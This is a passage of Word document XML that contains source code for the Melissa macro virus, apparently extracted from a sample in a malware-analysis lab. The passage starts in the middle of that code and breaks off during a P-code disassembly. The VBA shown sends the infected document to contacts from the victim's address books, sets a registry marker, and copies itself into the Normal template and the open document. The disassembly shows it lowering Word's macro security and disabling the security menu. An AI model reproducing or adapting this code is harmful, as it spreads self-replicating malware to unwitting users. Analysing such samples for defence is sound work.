    </w:p>
    <w:p w14:paraId="0D3D05EC" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">    For y = 1 To DasMapiName.AddressLists.Count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7918D4DF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">        Set AddyBook = DasMapiName.AddressLists(y)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AB5A4F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">        x = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B466BB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D61290" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">        For oo = 1 To AddyBook.AddressEntries.Count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5692F740" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">            Peep = AddyBook.AddressEntries(x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F244364" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">            BreakUmOffASlice.Recipients.Add Peep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3A37CF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">            x = x + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7BC9EF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">            If x &gt; 50 Then oo = AddyBook.AddressEntries.Count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FE7F1C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">         Next oo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5F323C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">         BreakUmOffASlice.Subject = "Important Message From " &amp; Application.UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4516F233" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">         BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C567688" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0DF761" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">         BreakUmOffASlice.Send</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED81203" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">         Peep = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4237EBC2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">    Next y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765C5641" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>DasMapiName.Logoff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F65E137" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127DE083" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021AB9CA" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565636B3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447D5356" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F2E0B6" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>NTCL = NTI1.CodeModule.CountOfLines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA3711E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>ADCL = ADI1.CodeModule.CountOfLines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F378548" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>BGN = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7000FEE2" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>If ADI1.Name &lt;&gt; "Melissa" Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713F1B3C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>If ADCL &gt; 0 Then _</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D04C5CF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>ADI1.CodeModule.DeleteLines 1, ADCL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B255729" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Set ToInfect = ADI1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428DAC3E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>ADI1.Name = "Melissa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50159306" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>DoAD = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B6387A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A17E5A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>If NTI1.Name &lt;&gt; "Melissa" Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09794154" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>If NTCL &gt; 0 Then _</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCBE619" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>NTI1.CodeModule.DeleteLines 1, NTCL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2846F180" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Set ToInfect = NTI1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AB799E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>NTI1.Name = "Melissa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01656C22" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>DoNT = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF1FDA3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209C3347" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>If DoNT &lt;&gt; True And DoAD &lt;&gt; True Then GoTo CYA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236800B3" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>If DoNT = True Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EFA350" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Do While ADI1.CodeModule.Lines(1, 1) = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5912CF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>ADI1.CodeModule.DeleteLines 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47337028" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B628A2C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5B7315" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Do While ADI1.CodeModule.Lines(BGN, 1) &lt;&gt; ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055AAFD8" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0318A253" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>BGN = BGN + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63180E1C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE23EB6" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8CA43B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>If DoAD = True Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74855CA6" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Do While NTI1.CodeModule.Lines(1, 1) = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4037D4" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>NTI1.CodeModule.DeleteLines 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AA8CAB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE34EFF" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415A3C11" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Do While NTI1.CodeModule.Lines(BGN, 1) &lt;&gt; ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF3131" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACEF68C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>BGN = BGN + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D53938" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F00E399" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50283EA5" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>CYA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F82685" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>If NTCL &lt;&gt; 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EA8957" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>ActiveDocument.SaveAs FileName:=ActiveDocument.FullName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A3C451" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>ElseIf (InStr(1, ActiveDocument.Name, "Document") &lt;&gt; False) Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AF3F0C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ActiveDocument.Saved = True: End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5312B794" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>'WORD/Melissa written by Kwyjibo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10198B4D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>'Works in both Word 2000 and Word 97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F01B6FB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD582E4" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>'Word -&gt; Email | Word 97 &lt;--&gt; Word 2000 ... it's a new age!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0B3825" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3275E30C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9403B8" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB"/>
    <w:p w14:paraId="1C5FAB2C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>-------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D367E3E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">VBA MACRO VBA_P-code.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E95E065" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>in file: VBA P-code - OLE stream: 'VBA P-code'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CE74A8" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195E3570" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Processing file: sample_lab6_18_sep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E34CC73" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' ===============================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A942B8C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Module streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0157768D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Macros/VBA/Melissa - 6327 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136BA6CA" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EA4344" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>FuncDefn (Private Sub Document_Open())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D23494D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBFFD00" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">OnError (Resume Next) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4959F27E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB8B19B" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A823504" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3038ACA7" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0005 "Level"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0944401D" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld System </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5C49EA" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd PrivateProfileString 0x0003 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618C6462" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F3DD4A" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637D49FB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">IfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C03D0" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7B3668" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E2E037" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x000B "Security..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C06CCE" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0005 "Macro"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021AF7FA" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsLd CommandBars 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA7DCD4" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Controls 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CF94E6" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt Enabled </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47900AE7" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFF2777" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI4 0x0001 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069A017C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D37B242" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBE815E" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0005 "Level"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7375C27F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld System </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B369B1" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemSt PrivateProfileString 0x0003 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EA5FFB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2270C7E6" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ElseBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB1805F" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t>' Line #6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439690BB" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023B3612" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB">
      <w:r>
